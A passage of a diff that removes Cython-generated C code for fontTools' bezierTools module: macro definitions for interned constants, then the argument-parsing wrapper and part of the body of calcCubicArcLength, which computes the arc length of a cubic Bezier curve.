__pyx_mstate_global->__pyx_n_s_range -#define __pyx_n_s_range1 __pyx_mstate_global->__pyx_n_s_range1 -#define __pyx_n_s_range2 __pyx_mstate_global->__pyx_n_s_range2 -#define __pyx_n_s_rectArea __pyx_mstate_global->__pyx_n_s_rectArea -#define __pyx_n_s_roots __pyx_mstate_global->__pyx_n_s_roots -#define __pyx_n_s_rotate __pyx_mstate_global->__pyx_n_s_rotate -#define __pyx_n_s_round __pyx_mstate_global->__pyx_n_s_round -#define __pyx_n_s_s __pyx_mstate_global->__pyx_n_s_s -#define __pyx_n_s_s1 __pyx_mstate_global->__pyx_n_s_s1 -#define __pyx_n_s_s1x __pyx_mstate_global->__pyx_n_s_s1x -#define __pyx_n_s_s1y __pyx_mstate_global->__pyx_n_s_s1y -#define __pyx_n_s_s2 __pyx_mstate_global->__pyx_n_s_s2 -#define __pyx_n_s_s2x __pyx_mstate_global->__pyx_n_s_s2x -#define __pyx_n_s_s2y __pyx_mstate_global->__pyx_n_s_s2y -#define __pyx_kp_u_s_2 __pyx_mstate_global->__pyx_kp_u_s_2 -#define __pyx_n_s_scale __pyx_mstate_global->__pyx_n_s_scale -#define __pyx_n_s_sectRect __pyx_mstate_global->__pyx_n_s_sectRect -#define __pyx_n_s_seen __pyx_mstate_global->__pyx_n_s_seen -#define __pyx_n_s_seg __pyx_mstate_global->__pyx_n_s_seg -#define __pyx_n_s_seg1 __pyx_mstate_global->__pyx_n_s_seg1 -#define __pyx_n_s_seg2 __pyx_mstate_global->__pyx_n_s_seg2 -#define __pyx_n_s_segment __pyx_mstate_global->__pyx_n_s_segment -#define __pyx_n_s_segmentPointAtT __pyx_mstate_global->__pyx_n_s_segmentPointAtT -#define __pyx_n_u_segmentPointAtT __pyx_mstate_global->__pyx_n_u_segmentPointAtT -#define __pyx_n_s_segmentSegmentIntersections __pyx_mstate_global->__pyx_n_s_segmentSegmentIntersections -#define __pyx_n_u_segmentSegmentIntersections __pyx_mstate_global->__pyx_n_u_segmentSegmentIntersections -#define __pyx_kp_u_segmentSegmentIntersections_line __pyx_mstate_global->__pyx_kp_u_segmentSegmentIntersections_line -#define __pyx_n_s_segmentrepr __pyx_mstate_global->__pyx_n_s_segmentrepr -#define __pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2 __pyx_mstate_global->__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2 
-#define __pyx_kp_u_segmentrepr_line_1449 __pyx_mstate_global->__pyx_kp_u_segmentrepr_line_1449 -#define __pyx_n_s_segmentrepr_locals_genexpr __pyx_mstate_global->__pyx_n_s_segmentrepr_locals_genexpr -#define __pyx_n_s_segments __pyx_mstate_global->__pyx_n_s_segments -#define __pyx_n_s_send __pyx_mstate_global->__pyx_n_s_send -#define __pyx_n_s_slope12 __pyx_mstate_global->__pyx_n_s_slope12 -#define __pyx_n_s_slope34 __pyx_mstate_global->__pyx_n_s_slope34 -#define __pyx_n_s_solutions __pyx_mstate_global->__pyx_n_s_solutions -#define __pyx_n_s_solveCubic __pyx_mstate_global->__pyx_n_s_solveCubic -#define __pyx_n_u_solveCubic __pyx_mstate_global->__pyx_n_u_solveCubic -#define __pyx_kp_u_solveCubic_line_841 __pyx_mstate_global->__pyx_kp_u_solveCubic_line_841 -#define __pyx_n_s_solveQuadratic __pyx_mstate_global->__pyx_n_s_solveQuadratic -#define __pyx_n_u_solveQuadratic __pyx_mstate_global->__pyx_n_u_solveQuadratic -#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec -#define __pyx_n_s_splitCubic __pyx_mstate_global->__pyx_n_s_splitCubic -#define __pyx_n_u_splitCubic __pyx_mstate_global->__pyx_n_u_splitCubic -#define __pyx_n_s_splitCubicAtT __pyx_mstate_global->__pyx_n_s_splitCubicAtT -#define __pyx_n_s_splitCubicAtTC __pyx_mstate_global->__pyx_n_s_splitCubicAtTC -#define __pyx_n_u_splitCubicAtTC __pyx_mstate_global->__pyx_n_u_splitCubicAtTC -#define __pyx_n_s_splitCubicAtTC_2 __pyx_mstate_global->__pyx_n_s_splitCubicAtTC_2 -#define __pyx_n_s_splitCubicAtT_2 __pyx_mstate_global->__pyx_n_s_splitCubicAtT_2 -#define __pyx_n_u_splitCubicAtT_2 __pyx_mstate_global->__pyx_n_u_splitCubicAtT_2 -#define __pyx_kp_u_splitCubicAtT_line_613 __pyx_mstate_global->__pyx_kp_u_splitCubicAtT_line_613 -#define __pyx_n_s_splitCubicIntoTwoAtTC __pyx_mstate_global->__pyx_n_s_splitCubicIntoTwoAtTC -#define __pyx_n_u_splitCubicIntoTwoAtTC __pyx_mstate_global->__pyx_n_u_splitCubicIntoTwoAtTC -#define __pyx_kp_u_splitCubic_line_552 __pyx_mstate_global->__pyx_kp_u_splitCubic_line_552 
-#define __pyx_n_s_splitCubic_locals_genexpr __pyx_mstate_global->__pyx_n_s_splitCubic_locals_genexpr -#define __pyx_n_s_splitLine __pyx_mstate_global->__pyx_n_s_splitLine -#define __pyx_n_u_splitLine __pyx_mstate_global->__pyx_n_u_splitLine -#define __pyx_kp_u_splitLine_line_450 __pyx_mstate_global->__pyx_kp_u_splitLine_line_450 -#define __pyx_n_s_splitQuadratic __pyx_mstate_global->__pyx_n_s_splitQuadratic -#define __pyx_n_u_splitQuadratic __pyx_mstate_global->__pyx_n_u_splitQuadratic -#define __pyx_n_s_splitQuadraticAtT __pyx_mstate_global->__pyx_n_s_splitQuadraticAtT -#define __pyx_n_s_splitQuadraticAtT_2 __pyx_mstate_global->__pyx_n_s_splitQuadraticAtT_2 -#define __pyx_n_u_splitQuadraticAtT_2 __pyx_mstate_global->__pyx_n_u_splitQuadraticAtT_2 -#define __pyx_kp_u_splitQuadraticAtT_line_589 __pyx_mstate_global->__pyx_kp_u_splitQuadraticAtT_line_589 -#define __pyx_kp_u_splitQuadratic_line_507 __pyx_mstate_global->__pyx_kp_u_splitQuadratic_line_507 -#define __pyx_n_s_splitQuadratic_locals_genexpr __pyx_mstate_global->__pyx_n_s_splitQuadratic_locals_genexpr -#define __pyx_n_s_split_cubic_into_two __pyx_mstate_global->__pyx_n_s_split_cubic_into_two -#define __pyx_n_s_split_segment_at_t __pyx_mstate_global->__pyx_n_s_split_segment_at_t -#define __pyx_n_s_sqrt __pyx_mstate_global->__pyx_n_s_sqrt -#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start -#define __pyx_n_s_swapped __pyx_mstate_global->__pyx_n_s_swapped -#define __pyx_n_s_sx __pyx_mstate_global->__pyx_n_s_sx -#define __pyx_n_s_sy __pyx_mstate_global->__pyx_n_s_sy -#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys -#define __pyx_n_s_t __pyx_mstate_global->__pyx_n_s_t -#define __pyx_n_s_t1 __pyx_mstate_global->__pyx_n_s_t1 -#define __pyx_n_u_t1 __pyx_mstate_global->__pyx_n_u_t1 -#define __pyx_n_s_t1_2 __pyx_mstate_global->__pyx_n_s_t1_2 -#define __pyx_n_s_t1_3 __pyx_mstate_global->__pyx_n_s_t1_3 -#define __pyx_n_s_t2 __pyx_mstate_global->__pyx_n_s_t2 -#define __pyx_n_u_t2 
__pyx_mstate_global->__pyx_n_u_t2 -#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test -#define __pyx_n_s_testmod __pyx_mstate_global->__pyx_n_s_testmod -#define __pyx_n_s_theta __pyx_mstate_global->__pyx_n_s_theta -#define __pyx_n_s_throw __pyx_mstate_global->__pyx_n_s_throw -#define __pyx_n_s_tolerance __pyx_mstate_global->__pyx_n_s_tolerance -#define __pyx_n_s_transformPoints __pyx_mstate_global->__pyx_n_s_transformPoints -#define __pyx_n_s_translate __pyx_mstate_global->__pyx_n_s_translate -#define __pyx_n_s_ts __pyx_mstate_global->__pyx_n_s_ts -#define __pyx_n_s_two __pyx_mstate_global->__pyx_n_s_two -#define __pyx_n_s_unique_key __pyx_mstate_global->__pyx_n_s_unique_key -#define __pyx_n_s_unique_values __pyx_mstate_global->__pyx_n_s_unique_values -#define __pyx_n_s_v0 __pyx_mstate_global->__pyx_n_s_v0 -#define __pyx_n_s_v1 __pyx_mstate_global->__pyx_n_s_v1 -#define __pyx_n_s_v2 __pyx_mstate_global->__pyx_n_s_v2 -#define __pyx_n_s_v3 __pyx_mstate_global->__pyx_n_s_v3 -#define __pyx_n_s_v4 __pyx_mstate_global->__pyx_n_s_v4 -#define __pyx_n_s_where __pyx_mstate_global->__pyx_n_s_where -#define __pyx_n_s_x __pyx_mstate_global->__pyx_n_s_x -#define __pyx_n_s_x0 __pyx_mstate_global->__pyx_n_s_x0 -#define __pyx_n_s_x1 __pyx_mstate_global->__pyx_n_s_x1 -#define __pyx_n_s_x2 __pyx_mstate_global->__pyx_n_s_x2 -#define __pyx_n_s_x3 __pyx_mstate_global->__pyx_n_s_x3 -#define __pyx_n_s_x4 __pyx_mstate_global->__pyx_n_s_x4 -#define __pyx_n_s_xDiff __pyx_mstate_global->__pyx_n_s_xDiff -#define __pyx_n_s_xRoots __pyx_mstate_global->__pyx_n_s_xRoots -#define __pyx_n_s_y __pyx_mstate_global->__pyx_n_s_y -#define __pyx_n_s_y1 __pyx_mstate_global->__pyx_n_s_y1 -#define __pyx_n_s_y2 __pyx_mstate_global->__pyx_n_s_y2 -#define __pyx_n_s_y3 __pyx_mstate_global->__pyx_n_s_y3 -#define __pyx_n_s_y4 __pyx_mstate_global->__pyx_n_s_y4 -#define __pyx_n_s_yDiff __pyx_mstate_global->__pyx_n_s_yDiff -#define __pyx_n_s_yRoots __pyx_mstate_global->__pyx_n_s_yRoots -#define 
__pyx_float_0_0 __pyx_mstate_global->__pyx_float_0_0 -#define __pyx_float_0_5 __pyx_mstate_global->__pyx_float_0_5 -#define __pyx_float_1_0 __pyx_mstate_global->__pyx_float_1_0 -#define __pyx_float_2_0 __pyx_mstate_global->__pyx_float_2_0 -#define __pyx_float_3_0 __pyx_mstate_global->__pyx_float_3_0 -#define __pyx_float_4_0 __pyx_mstate_global->__pyx_float_4_0 -#define __pyx_float_9_0 __pyx_mstate_global->__pyx_float_9_0 -#define __pyx_float_1eneg_3 __pyx_mstate_global->__pyx_float_1eneg_3 -#define __pyx_float_27_0 __pyx_mstate_global->__pyx_float_27_0 -#define __pyx_float_54_0 __pyx_mstate_global->__pyx_float_54_0 -#define __pyx_float_0_005 __pyx_mstate_global->__pyx_float_0_005 -#define __pyx_float_0_125 __pyx_mstate_global->__pyx_float_0_125 -#define __pyx_float_1eneg_10 __pyx_mstate_global->__pyx_float_1eneg_10 -#define __pyx_float_neg_2_0 __pyx_mstate_global->__pyx_float_neg_2_0 -#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 -#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 -#define __pyx_int_2 __pyx_mstate_global->__pyx_int_2 -#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 -#define __pyx_int_6 __pyx_mstate_global->__pyx_int_6 -#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 -#define __pyx_codeobj_ __pyx_mstate_global->__pyx_codeobj_ -#define __pyx_tuple__2 __pyx_mstate_global->__pyx_tuple__2 -#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 -#define __pyx_tuple__5 __pyx_mstate_global->__pyx_tuple__5 -#define __pyx_tuple__6 __pyx_mstate_global->__pyx_tuple__6 -#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 -#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 -#define __pyx_tuple__14 __pyx_mstate_global->__pyx_tuple__14 -#define __pyx_tuple__15 __pyx_mstate_global->__pyx_tuple__15 -#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 -#define __pyx_tuple__19 __pyx_mstate_global->__pyx_tuple__19 -#define __pyx_tuple__21 __pyx_mstate_global->__pyx_tuple__21 -#define __pyx_tuple__23 
__pyx_mstate_global->__pyx_tuple__23 -#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 -#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 -#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 -#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 -#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 -#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 -#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 -#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 -#define __pyx_tuple__42 __pyx_mstate_global->__pyx_tuple__42 -#define __pyx_tuple__44 __pyx_mstate_global->__pyx_tuple__44 -#define __pyx_tuple__46 __pyx_mstate_global->__pyx_tuple__46 -#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 -#define __pyx_tuple__50 __pyx_mstate_global->__pyx_tuple__50 -#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 -#define __pyx_tuple__53 __pyx_mstate_global->__pyx_tuple__53 -#define __pyx_tuple__55 __pyx_mstate_global->__pyx_tuple__55 -#define __pyx_tuple__57 __pyx_mstate_global->__pyx_tuple__57 -#define __pyx_tuple__59 __pyx_mstate_global->__pyx_tuple__59 -#define __pyx_tuple__61 __pyx_mstate_global->__pyx_tuple__61 -#define __pyx_tuple__63 __pyx_mstate_global->__pyx_tuple__63 -#define __pyx_tuple__65 __pyx_mstate_global->__pyx_tuple__65 -#define __pyx_tuple__67 __pyx_mstate_global->__pyx_tuple__67 -#define __pyx_tuple__69 __pyx_mstate_global->__pyx_tuple__69 -#define __pyx_tuple__71 __pyx_mstate_global->__pyx_tuple__71 -#define __pyx_tuple__73 __pyx_mstate_global->__pyx_tuple__73 -#define __pyx_tuple__75 __pyx_mstate_global->__pyx_tuple__75 -#define __pyx_tuple__77 __pyx_mstate_global->__pyx_tuple__77 -#define __pyx_tuple__79 __pyx_mstate_global->__pyx_tuple__79 -#define __pyx_tuple__81 __pyx_mstate_global->__pyx_tuple__81 -#define __pyx_tuple__83 __pyx_mstate_global->__pyx_tuple__83 -#define __pyx_tuple__85 __pyx_mstate_global->__pyx_tuple__85 -#define __pyx_tuple__87 
__pyx_mstate_global->__pyx_tuple__87 -#define __pyx_tuple__89 __pyx_mstate_global->__pyx_tuple__89 -#define __pyx_tuple__92 __pyx_mstate_global->__pyx_tuple__92 -#define __pyx_tuple__94 __pyx_mstate_global->__pyx_tuple__94 -#define __pyx_tuple__95 __pyx_mstate_global->__pyx_tuple__95 -#define __pyx_tuple__97 __pyx_mstate_global->__pyx_tuple__97 -#define __pyx_tuple__99 __pyx_mstate_global->__pyx_tuple__99 -#define __pyx_codeobj__3 __pyx_mstate_global->__pyx_codeobj__3 -#define __pyx_codeobj__7 __pyx_mstate_global->__pyx_codeobj__7 -#define __pyx_tuple__101 __pyx_mstate_global->__pyx_tuple__101 -#define __pyx_codeobj__13 __pyx_mstate_global->__pyx_codeobj__13 -#define __pyx_codeobj__16 __pyx_mstate_global->__pyx_codeobj__16 -#define __pyx_codeobj__18 __pyx_mstate_global->__pyx_codeobj__18 -#define __pyx_codeobj__20 __pyx_mstate_global->__pyx_codeobj__20 -#define __pyx_codeobj__22 __pyx_mstate_global->__pyx_codeobj__22 -#define __pyx_codeobj__24 __pyx_mstate_global->__pyx_codeobj__24 -#define __pyx_codeobj__25 __pyx_mstate_global->__pyx_codeobj__25 -#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 -#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 -#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 -#define __pyx_codeobj__33 __pyx_mstate_global->__pyx_codeobj__33 -#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 -#define __pyx_codeobj__37 __pyx_mstate_global->__pyx_codeobj__37 -#define __pyx_codeobj__39 __pyx_mstate_global->__pyx_codeobj__39 -#define __pyx_codeobj__41 __pyx_mstate_global->__pyx_codeobj__41 -#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 -#define __pyx_codeobj__45 __pyx_mstate_global->__pyx_codeobj__45 -#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 -#define __pyx_codeobj__49 __pyx_mstate_global->__pyx_codeobj__49 -#define __pyx_codeobj__51 __pyx_mstate_global->__pyx_codeobj__51 -#define __pyx_codeobj__54 __pyx_mstate_global->__pyx_codeobj__54 -#define 
__pyx_codeobj__56 __pyx_mstate_global->__pyx_codeobj__56 -#define __pyx_codeobj__58 __pyx_mstate_global->__pyx_codeobj__58 -#define __pyx_codeobj__60 __pyx_mstate_global->__pyx_codeobj__60 -#define __pyx_codeobj__62 __pyx_mstate_global->__pyx_codeobj__62 -#define __pyx_codeobj__64 __pyx_mstate_global->__pyx_codeobj__64 -#define __pyx_codeobj__66 __pyx_mstate_global->__pyx_codeobj__66 -#define __pyx_codeobj__68 __pyx_mstate_global->__pyx_codeobj__68 -#define __pyx_codeobj__70 __pyx_mstate_global->__pyx_codeobj__70 -#define __pyx_codeobj__72 __pyx_mstate_global->__pyx_codeobj__72 -#define __pyx_codeobj__74 __pyx_mstate_global->__pyx_codeobj__74 -#define __pyx_codeobj__76 __pyx_mstate_global->__pyx_codeobj__76 -#define __pyx_codeobj__78 __pyx_mstate_global->__pyx_codeobj__78 -#define __pyx_codeobj__80 __pyx_mstate_global->__pyx_codeobj__80 -#define __pyx_codeobj__82 __pyx_mstate_global->__pyx_codeobj__82 -#define __pyx_codeobj__84 __pyx_mstate_global->__pyx_codeobj__84 -#define __pyx_codeobj__86 __pyx_mstate_global->__pyx_codeobj__86 -#define __pyx_codeobj__88 __pyx_mstate_global->__pyx_codeobj__88 -#define __pyx_codeobj__90 __pyx_mstate_global->__pyx_codeobj__90 -#define __pyx_codeobj__93 __pyx_mstate_global->__pyx_codeobj__93 -#define __pyx_codeobj__96 __pyx_mstate_global->__pyx_codeobj__96 -#define __pyx_codeobj__98 __pyx_mstate_global->__pyx_codeobj__98 -#define __pyx_codeobj__100 __pyx_mstate_global->__pyx_codeobj__100 -#define __pyx_codeobj__102 __pyx_mstate_global->__pyx_codeobj__102 -/* #### Code section: module_code ### */ - -/* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_calcCubicArcLength, "calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005)\nCalculates the arc length for a cubic Bezier segment.\n\n Whereas :func:`approximateCubicArcLength` approximates the length, this\n function calculates it by \"measuring\", recursively dividing the curve\n until the divided segments are shorter than ``tolerance``.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n tolerance: Controls the precision of the calculation.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_1calcCubicArcLength = {"calcCubicArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_calcCubicArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_1calcCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_tolerance = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicArcLength (wrapper)", 0); - #if 
!CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_tolerance,0}; - values[4] = __Pyx_Arg_NewRef_FASTCALL(((PyObject *)((PyObject*)__pyx_float_0_005))); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 1); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) 
__PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 2); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, 3); __PYX_ERR(0, 56, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tolerance); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 56, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicArcLength") < 0)) __PYX_ERR(0, 56, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_tolerance = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicArcLength", 0, 4, 5, __pyx_nargs); __PYX_ERR(0, 56, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - 
__Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_tolerance); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_tolerance) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - int __pyx_t_8; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicArcLength", 1); - - /* "fontTools/misc/bezierTools.py":70 - * Arc length value. 
- * """ - * return calcCubicArcLengthC( # <<<<<<<<<<<<<< - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4), tolerance - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 70, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":71 - * """ - * return calcCubicArcLengthC( - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4), tolerance # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 71, __pyx_L1_error) - 